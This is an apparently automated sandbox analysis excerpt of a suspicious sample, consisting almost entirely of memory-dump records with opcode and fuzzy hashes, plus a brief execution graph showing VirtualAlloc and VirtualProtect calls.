                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f3aa6bbdb80f4a0bb7542d4c1076c86be121aa93e044477cebc99ad848c2b068
                                            • Instruction ID: 55faa959f09acb32063e09c58113c050080fb05d8e9df5bad3894a3b9c3aa070
                                            • Opcode Fuzzy Hash: f3aa6bbdb80f4a0bb7542d4c1076c86be121aa93e044477cebc99ad848c2b068
                                            • Instruction Fuzzy Hash: BF315E3260C9498FDF9DEF28C4A5DA4B3E1FF6931470402ADD44EC75A2DE25E945CB81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cef714c93d50e35c4432258e85d8364ecd724decc0a666804339126aa1bb9905
                                            • Instruction ID: 6e75e41d76a26763dc47af4ca9011a104d2be58ce984561a669f702eb1fa938d
                                            • Opcode Fuzzy Hash: cef714c93d50e35c4432258e85d8364ecd724decc0a666804339126aa1bb9905
                                            • Instruction Fuzzy Hash: 41318F3260C9498FDF98EF1CC4A5DA4B7E1FF6831070442AED44AC75A2DE39E945CB81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0899c6bfe0fbd590813d78e3749edad680bbfce47597cf81fa84630d820566e9
                                            • Instruction ID: 7eabbc7ab54bdf3d78d0f4c9dcf6966f82a8109ed4efd3ab8dbab07dad273412
                                            • Opcode Fuzzy Hash: 0899c6bfe0fbd590813d78e3749edad680bbfce47597cf81fa84630d820566e9
                                            • Instruction Fuzzy Hash: 5931303260C9498FDF98EF28C4A5DA4B3E1FF6831471402ADD04EC75A2DE39E945CB81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37eed5b624627ee31e984fdf57d1f0ae3a5b7ff2ddbc3223fec0852b2d1ab765
                                            • Instruction ID: 2a360e1a43cc1bde18a4f91f9c9c68db591277a557aaad3fe26636d9d2a7e8cd
                                            • Opcode Fuzzy Hash: 37eed5b624627ee31e984fdf57d1f0ae3a5b7ff2ddbc3223fec0852b2d1ab765
                                            • Instruction Fuzzy Hash: 3C316F3260C9498FDF98EF58C4A5DA4B7E1FF6831070442AED04AC75A2DE39E945CB81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84347a935215eaf8e0df74088e35f93ea7950723cbfc94a7b44ac48737d74ef1
                                            • Instruction ID: 4a092d65112c74fdffabe9b1714801050153004195e9d3fc28459c6501759544
                                            • Opcode Fuzzy Hash: 84347a935215eaf8e0df74088e35f93ea7950723cbfc94a7b44ac48737d74ef1
                                            • Instruction Fuzzy Hash: C8412930E14A5D8FDB94EF98D895AEDB7F1FF98305F10017AE419E32A5DA34A881CB40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fe4638c9222f95f2e2b65a397c0f1bbcd1b1a44261d8184bf288f57a135b2e9
                                            • Instruction ID: e0297d3851f7fbd2b8f45b9f84fc299aa02e02aa0d345eea3e8cf1f4dfc3fbb0
                                            • Opcode Fuzzy Hash: 7fe4638c9222f95f2e2b65a397c0f1bbcd1b1a44261d8184bf288f57a135b2e9
                                            • Instruction Fuzzy Hash: 8E41ED75E1851D8FDBA4EF14C8A5BEDB7B1EB58309F1001EAD00EE32A5DB746A818F41
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29f54a14cf5ee83df9464d229e61de363cf1962e48933ab80394605b08173799
                                            • Instruction ID: ef52c2852260ebfbc78b5a2c507cef63307a1274afc9d3bf9bdaa23322db7772
                                            • Opcode Fuzzy Hash: 29f54a14cf5ee83df9464d229e61de363cf1962e48933ab80394605b08173799
                                            • Instruction Fuzzy Hash: B531C331E4E95E9FDB55EFA8D8648ED7BB0FF05304F0401BBD00AD71A2DA3969058750
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 57c89278ea93715dad806e71563c2f16722655bf236e46e88a919e7ccd54dfd5
                                            • Instruction ID: 54542c4d7fc8576341436df4bae2fa83b03f5899c7a1cf65b9d2969352bd8d75
                                            • Opcode Fuzzy Hash: 57c89278ea93715dad806e71563c2f16722655bf236e46e88a919e7ccd54dfd5
                                            • Instruction Fuzzy Hash: 2631E071F19D4E8FEB64DF88D8A19ACB7A1FF54340F910279E01BD32A1DE3669129740
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9cf5de7ff3761959c458e919036588dfbdccad92278537b4473d85a41ee4ef3
                                            • Instruction ID: dc9829e7c263ce65bfbaf74214fa6673fa4aa6cbfaebb884fa1640f3b67f0a66
                                            • Opcode Fuzzy Hash: f9cf5de7ff3761959c458e919036588dfbdccad92278537b4473d85a41ee4ef3
                                            • Instruction Fuzzy Hash: 7B31E72098F7C94FE753D77898686E93F616F43324F1A01FAE0968E4B3D6AA0615C712
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a311f960528f991cc8cbe0e3761862e22280dbf42d4597c25ed581e78655e10
                                            • Instruction ID: cacc7884141fd2e21552a3c446a8049e808575aa246ccf76926655f255f6fd3c
                                            • Opcode Fuzzy Hash: 2a311f960528f991cc8cbe0e3761862e22280dbf42d4597c25ed581e78655e10
                                            • Instruction Fuzzy Hash: C731E823F4EE8E4FE7659AAC58754E57B90EF51350B0502B6D09ECB4E3D92A68068341
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1e8c0766d4a93b790a77260d6ba4b5abcd58149bc2f5e4d55e111124d114ef3
                                            • Instruction ID: eb0685262770cf7af726b3b24833a714d5235384cc8bdda5835b55378e738e37
                                            • Opcode Fuzzy Hash: d1e8c0766d4a93b790a77260d6ba4b5abcd58149bc2f5e4d55e111124d114ef3
                                            • Instruction Fuzzy Hash: AD316271B49A1A8FDB58DF98D4A15A8B3B2FF84350B118239D14EC36A2DF35BC52C780
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 904a15949bb1c9b999f556fd2c8d83cb237ac971dfa8e03628da2984962d09c0
                                            • Instruction ID: fafac50dda4b1f4f0ad5987657a6e9741685b0fb1b39c071a6cbfd95f4e779f8
                                            • Opcode Fuzzy Hash: 904a15949bb1c9b999f556fd2c8d83cb237ac971dfa8e03628da2984962d09c0
                                            • Instruction Fuzzy Hash: BB214232A1D3985ED721BB7CA8994EB3FD0EF4922DB14027FE4D9C3193D92490469381
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7372580f10c19870594b7e58f2b9392620a29058bda49219cb4338aab6ab4f10
                                            • Instruction ID: 4c5358b40adf97d60885ff68bf8c402818565cf3e5c8e353d4161f0b6e0c6a39
                                            • Opcode Fuzzy Hash: 7372580f10c19870594b7e58f2b9392620a29058bda49219cb4338aab6ab4f10
                                            • Instruction Fuzzy Hash: F9313431E0D28E8FE712EBA8CC616EE77B4EF45314F054177D015C71D2EA38660A8B50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e41975537c82fd149c660909061543e79a49ee372e5f30df19e266111af4f43
                                            • Instruction ID: a821c8a703c41439fcfe6489fac06773e584abccc0fbc8f3f7b2b7f02f6b5fb2
                                            • Opcode Fuzzy Hash: 5e41975537c82fd149c660909061543e79a49ee372e5f30df19e266111af4f43
                                            • Instruction Fuzzy Hash: AF21A230A5DA4D9FCB94DF94C8605EDBBB1FF59300F4106BAD00AE32E2DA35A901CB11
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b1100ab5ebdf02074c7013f2a6cf047fbc031649d470fcf6fd3a793242a407e0
                                            • Instruction ID: c8b196e059e684dce854672301bc864b1fa45278d8025b972730843f213da34b
                                            • Opcode Fuzzy Hash: b1100ab5ebdf02074c7013f2a6cf047fbc031649d470fcf6fd3a793242a407e0
                                            • Instruction Fuzzy Hash: 72116D12B4EDCD0BD72AA7B848B15F43F91DF86200B0A42F6D48EC71D7DD2EA9058341
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d51803fdf27226e257f031fad806ffd9343c5b29b3590d7ded067dd2cfbcd8b
                                            • Instruction ID: dac9448b89b19ec2177faabab5fb0fe0cc672d2c84b68cf1f963a3dc4939f863
                                            • Opcode Fuzzy Hash: 9d51803fdf27226e257f031fad806ffd9343c5b29b3590d7ded067dd2cfbcd8b
                                            • Instruction Fuzzy Hash: 16310C30E5A90ECFDBA8DF988465ABD77B0FF44344F51027AD40FD22A1DE3A6A449741
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 318702ac2f3ec8930a20ab95119e976152fa00a93b7e7c547816837c101b1625
                                            • Instruction ID: 2fd69c067599358cef07c018c070d24fa366cc82de5dd1b2ada5b7d7169c1f24
                                            • Opcode Fuzzy Hash: 318702ac2f3ec8930a20ab95119e976152fa00a93b7e7c547816837c101b1625
                                            • Instruction Fuzzy Hash: 97215C50A5E99F8EE73A8B544470574BB61EF5230171987FAE09BCB0EBC93DB942C381
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e3b304ac3d6d162c51bd25437926212abc63604e6315b673fd32b6e4ab0ae3e
                                            • Instruction ID: 61b3d304d1248673f35da526164d04d2c7c01d76f374d0dc6d7236558f70c12e
                                            • Opcode Fuzzy Hash: 1e3b304ac3d6d162c51bd25437926212abc63604e6315b673fd32b6e4ab0ae3e
                                            • Instruction Fuzzy Hash: A021FB31E0491D9FDF98DF58C4A5AE8B7B1FF68310F0141AED04EE36A1CA35A981CB40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:

                                            Execution Graph

                                            Execution Coverage:4.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0
                                            execution_graph
                                            17319 7ffd9b8c26fe
                                            17320 7ffd9b8c270d VirtualProtect
                                            17319->17320
                                            17322 7ffd9b8c284d
                                            17320->17322
                                            17315 7ffd9b8c40ed
                                            17316 7ffd9b8c410f VirtualAlloc
                                            17315->17316
                                            17318 7ffd9b8c4225
                                            17316->17318

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph
                                            331 7ffd9b8b1a35-7ffd9b8b1aa8
                                            338 7ffd9b8b1aaa-7ffd9b8b1ad0
                                            331->338
                                            339 7ffd9b8b1b02-7ffd9b8b1b49
                                            331->339
                                            338->339
                                            345 7ffd9b8b1b4b
                                            339->345
                                            346 7ffd9b8b1b50-7ffd9b8b1d26 call 7ffd9b8b0838
                                            339->346
                                            345->346
                                            371 7ffd9b8b1d28-7ffd9b8b1d33
                                            346->371
                                            372 7ffd9b8b1d3b-7ffd9b8b1dbc
                                            371->372
                                            375 7ffd9b8b1dc5-7ffd9b8b1e2c
                                            372->375
                                            376 7ffd9b8b1dbe-7ffd9b8b1dc4
                                            372->376
                                            376->375

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2
                                            • API String ID: 0-450215437
                                            • Opcode ID: a35bf82ab83bdb7de888424809a5e64c0b80a1f2c81deb9a6dbe3e8d0be3e618
                                            • Instruction ID: 53305101114947d7c5c5923c6f59454898ee7c650c7e8b5bace595c051db5636
                                            • Opcode Fuzzy Hash: a35bf82ab83bdb7de888424809a5e64c0b80a1f2c81deb9a6dbe3e8d0be3e618
                                            • Instruction Fuzzy Hash: 3632BDB0E1991D8FDBA8EB58C8A5AB9B7B1FF58300F5041AAD00DD7295DA356E81CF40

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8c2000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 1709ff631bfff015e3b89e9defdf44e85995f6e79848a77b8ee89ce4468f1f79
                                            • Instruction ID: 95ce3c37bd54aa85cf86009b909b8392f2e31cec4b52844cc578ca1229cf6dae
                                            • Opcode Fuzzy Hash: 1709ff631bfff015e3b89e9defdf44e85995f6e79848a77b8ee89ce4468f1f79
                                            • Instruction Fuzzy Hash: 58516D74D0864D8FDB58DFA8C885AE9BBF1FF5A310F1042AAD449E3251DB74A885CB40

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 104 7ffd9b8c40ed-7ffd9b8c4223 VirtualAlloc 109 7ffd9b8c4225 104->109 110 7ffd9b8c422b-7ffd9b8c428f 104->110 109->110
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8c2000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 0f79a13b8c81ed6782b5f1870571a1ac84b2fd3484139ed94f0426bbe69a87ea
                                            • Instruction ID: c1379373fe7e44c9c6c75da23e6bf99ed063364f0d4d668c77100fd9bb0fe4ce
                                            • Opcode Fuzzy Hash: 0f79a13b8c81ed6782b5f1870571a1ac84b2fd3484139ed94f0426bbe69a87ea
                                            • Instruction Fuzzy Hash: D6514B70908A5D8FDF94EF68D845BE9BBF1FB69310F1041AAD04DE3255DB70A9858F80

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 113 7ffd9b8bc4b6-7ffd9b8bc4ca 114 7ffd9b8bc4d4-7ffd9b8bc517 113->114
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >
                                            • API String ID: 0-325317158
                                            • Opcode ID: 6bc67f4a226e8bbd3c4dc4bd85d8488da0f774ae3399aca52f6ca3e1f51a1f7c
                                            • Instruction ID: f6226952d50f41d37c2b543db537a6c13b651fe31493a70e1545d16312cbadaf
                                            • Opcode Fuzzy Hash: 6bc67f4a226e8bbd3c4dc4bd85d8488da0f774ae3399aca52f6ca3e1f51a1f7c
                                            • Instruction Fuzzy Hash: 2DF0B770D0912E8FEB609FA4C8687B9B6B0EB18304F1141F5D01EA2291CB786BC5CF51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b32c7645f7ac7c68ce72f12ab66c91f5cbeea371f59312049ed9b582ac0b896
                                            • Instruction ID: 1bebe49bd21d46c78043f14429d6a428bfad31bb4fd204ec1be2ea2f6ba1eca2
                                            • Opcode Fuzzy Hash: 6b32c7645f7ac7c68ce72f12ab66c91f5cbeea371f59312049ed9b582ac0b896
                                            • Instruction Fuzzy Hash: CB52CC70A1961D8FDBA9EB58C895BA8B7B1FF58701F1101EAD00DD72A1DB35AE81CF40

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87c8a689ab33de623c33b0e59644be751f5379f89441381972aa312ff124f032
                                            • Instruction ID: 72e74f0f6574e59259ca450c7aa69ffa9cded7b480f6f6e8332c5c5da8febbfa
                                            • Opcode Fuzzy Hash: 87c8a689ab33de623c33b0e59644be751f5379f89441381972aa312ff124f032
                                            • Instruction Fuzzy Hash: 04F12E71E1965D8FDBACDF58C8A57A8BBE1FF58300F4445BAD00DD32A2DA34A981CB41

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 381 7ffd9b902a2f-7ffd9b902a41 383 7ffd9b902a43-7ffd9b902a46 381->383 384 7ffd9b902a5d-7ffd9b902c4f 381->384 386 7ffd9b902a4b-7ffd9b902a5c 383->386 387 7ffd9b902a48 383->387 391 7ffd9b902c56-7ffd9b902c6e 384->391 392 7ffd9b902c51 384->392 386->384 387->386 393 7ffd9b902c74-7ffd9b902c81 391->393 392->391
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c6f636282fc4a6d1400aeaf8511cc80134cfd77c6e74a36fa7e027be392c828
                                            • Instruction ID: 5cd8d933ec2451d8da786ea61ad538316278ea8b34632d39df1858092691af55
                                            • Opcode Fuzzy Hash: 4c6f636282fc4a6d1400aeaf8511cc80134cfd77c6e74a36fa7e027be392c828
                                            • Instruction Fuzzy Hash: 6C21D035A0955E8FDB55EFA898689E93BA0FFA5315F1500BBD049C30E2DA349989C780

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8619930eb3f95d8394afca25aee2707b824fa7c6a00c4db15ba6e977d34804b9
                                            • Instruction ID: e040fa56567607f2f5236a2becd4c564d46d5b2df6dcf1f17a70f40987eba188
                                            • Opcode Fuzzy Hash: 8619930eb3f95d8394afca25aee2707b824fa7c6a00c4db15ba6e977d34804b9
                                            • Instruction Fuzzy Hash: AF715711F2EA5E0AF3685ABD08652B976C2DF89B11F26023ED4DFC32E7DC1C69034681

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 443 7ffd9b8b1afd-7ffd9b8b1b49 447 7ffd9b8b1b4b 443->447 448 7ffd9b8b1b50-7ffd9b8b1d33 call 7ffd9b8b0838 443->448 447->448 474 7ffd9b8b1d3b-7ffd9b8b1dbc 448->474 477 7ffd9b8b1dc5-7ffd9b8b1e2c 474->477 478 7ffd9b8b1dbe-7ffd9b8b1dc4 474->478 478->477
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e9bdd977e29065ca911abf6d89e4a8b6fbecee58a56dc8484e7708b566287608
                                            • Instruction ID: ab7638437ac37762999c0584785941ca69fb073c0d7a7df5056c146526beef07
                                            • Opcode Fuzzy Hash: e9bdd977e29065ca911abf6d89e4a8b6fbecee58a56dc8484e7708b566287608
                                            • Instruction Fuzzy Hash: 1AA1D071A18A8D8FEB98DB6CD8657F87BE1FF58300F44017ED009D72A6DB7828018B81

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8db5a76319a21c6dc69b6fefa43e649efd456f0a39edb8ff937745b876b49486
                                            • Instruction ID: ceb9ee03aa9ad0db12d70b2b17fe7dfe8eae9f850ba5ea365e0f1ab817912f6a
                                            • Opcode Fuzzy Hash: 8db5a76319a21c6dc69b6fefa43e649efd456f0a39edb8ff937745b876b49486
                                            • Instruction Fuzzy Hash: A2412931B1DA688FD764DB7C88556B97BE1FF5D301B05417EE09EC72A2DE24E8018B81

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f87b38a5c1d8fdb2a5d5ac5cb8173ff28873036b787e5f0b7208816746aafc51
                                            • Instruction ID: d4908ea12c5989c550a3eab42bfdf29793cc42656711ac4729f994968470e24b
                                            • Opcode Fuzzy Hash: f87b38a5c1d8fdb2a5d5ac5cb8173ff28873036b787e5f0b7208816746aafc51
                                            • Instruction Fuzzy Hash: 0751DA70A19A5D8FDFA8EF58C8A5BB8B7E2FF58300F5040A9D01DD7296DA35A941CB40

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 90d93c194128ef968345bf7fe689582d7909909f1220f9a86f338409d9e7165d
                                            • Instruction ID: a9bfd90bf4709bf77ee371314a6a9a6898a74f8e535a3c27ab3c1ca69f56b2ce
                                            • Opcode Fuzzy Hash: 90d93c194128ef968345bf7fe689582d7909909f1220f9a86f338409d9e7165d
                                            • Instruction Fuzzy Hash: D7519470E15A1D8FDB94EF98C895BADBBF1FB58301F2082AAD40DE3255DB346985CB40
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96d2cab12d1ffe578018975ca043720028c21b2bddb4f5caf237e70d3f0caeda
                                            • Instruction ID: 2b34c06446f0de9ff6b9138545d308d6671e8456d65fc734d42047e0e828e01a
